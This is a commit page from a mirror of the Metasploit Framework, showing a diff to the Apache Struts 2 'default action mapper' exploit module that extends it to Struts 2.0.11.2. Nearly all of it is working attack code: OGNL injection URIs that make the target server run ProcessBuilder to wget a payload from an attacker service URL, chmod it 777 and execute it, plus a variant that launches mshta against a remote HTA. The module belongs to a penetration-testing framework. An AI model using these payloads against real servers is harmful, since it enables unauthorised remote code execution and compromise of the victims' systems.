infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #2658 - Make OGNL expressions compatible with struts 2.0.11.2

bug/bundler_fix
sinn3r 2013-11-21 15:30:42 -06:00
parent 13f8a690a9 cec4166766
commit 22c7703e8b
No known key found for this signature in database
GPG Key ID: 2384DB4EF06F730B
1 changed files with 9 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

18
modules/exploits/multi/http/struts_default_action_mapper.rb
View File

@ -27,8 +27,8 @@ class Metasploit3 < Msf::Exploit::Remote
evaluated as OGNL expression against the value stack, this introduces the
possibility to inject server side code.
This module has been tested successfully on Struts 2.3.15 over Tomcat 7, with
Windows 2003 SP2 and Ubuntu 10.04 operating systems.
This module has been tested successfully on Struts 2.3.15 and Struts 2.0.11.2 over
Tomcat 7, with Windows 2003 SP2 and Ubuntu 10.04 operating systems.
},
'License' => MSF_LICENSE,
'Author' =>
@ -156,11 +156,11 @@ class Metasploit3 < Msf::Exploit::Remote
proof = rand_text_alpha(6 + rand(4))
res = send_request_cgi({
'uri' => "#{uri}?redirect:%25{new%20java.lang.String('#{proof}')}",
'uri' => "#{uri}?redirect:%24{new%20java.lang.String('#{proof}')}",
'method' => 'GET'
})
if res and res.code == 302 and res.headers['Location'] =~ /#{proof}/
if res and res.code == 302 and res.headers['Location'] =~ /#{proof}/ and res.headers['Location'] !~ /String/
return Exploit::CheckCode::Vulnerable
end
@ -181,7 +181,7 @@ class Metasploit3 < Msf::Exploit::Remote
proof = rand_text_alpha(6 + rand(4))
res = send_request_cgi({
'uri' => "#{uri}?redirect:%25{new%20java.io.File('.').getCanonicalPath().concat('#{proof}')}",
'uri' => "#{uri}?redirect:%24{new%20java.io.File('.').getCanonicalPath().concat('#{proof}')}",
'method' => 'GET'
})
@ -215,7 +215,7 @@ class Metasploit3 < Msf::Exploit::Remote
fname = "#{fname}/" unless fname =~ %r'/$'
fname << downfile
uri = normalize_uri(target_uri.path)
uri << "?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'wget','#{service_url}','-O',new%20java.lang.String('#{fname.gsub(/\//,"$")}').replace('$','\\u002f')})).start()}"
uri << "?redirect:%24{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'wget','#{service_url}','-O',new%20java.lang.String('#{fname.gsub(/\//,"$")}').replace('$','\\u002f')})).start()}"
print_status("#{rhost}:#{rport} - Downloading payload to #{fname}...")
@ -239,7 +239,7 @@ class Metasploit3 < Msf::Exploit::Remote
# chmod
#
uri = normalize_uri(target_uri.path)
uri << "?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'chmod','777',new%20java.lang.String('#{fname.gsub(/\//,"$")}').replace('$','\\u002f')})).start()}"
uri << "?redirect:%24{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'chmod','777',new%20java.lang.String('#{fname.gsub(/\//,"$")}').replace('$','\\u002f')})).start()}"
print_status("#{rhost}:#{rport} - Make payload executable...")
@ -256,7 +256,7 @@ class Metasploit3 < Msf::Exploit::Remote
# execute
#
uri = normalize_uri(target_uri.path)
uri << "?redirect:%25{(new%20java.lang.ProcessBuilder(new%20java.lang.String('#{fname.gsub(/\//,"$")}').replace('$','\\u002f'))).start()}"
uri << "?redirect:%24{(new%20java.lang.ProcessBuilder(new%20java.lang.String('#{fname.gsub(/\//,"$")}').replace('$','\\u002f'))).start()}"
print_status("#{rhost}:#{rport} - Execute payload...")
@ -285,7 +285,7 @@ class Metasploit3 < Msf::Exploit::Remote
# execute hta
#
uri = normalize_uri(target_uri.path)
uri << "?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'mshta',new%20java.lang.String('http:nn#{service_url}').replace('n','\\u002f')})).start()}"
uri << "?redirect:%24{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'mshta',new%20java.lang.String('http:nn#{service_url}').replace('n','\\u002f')})).start()}"
print_status("#{rhost}:#{rport} - Execute payload through malicious HTA...")